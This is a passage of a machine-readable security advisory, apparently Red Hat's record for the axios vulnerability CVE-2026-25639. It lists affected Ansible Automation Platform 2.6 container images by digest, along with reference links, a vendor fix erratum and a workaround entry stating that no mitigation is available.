"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T23:31:56+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
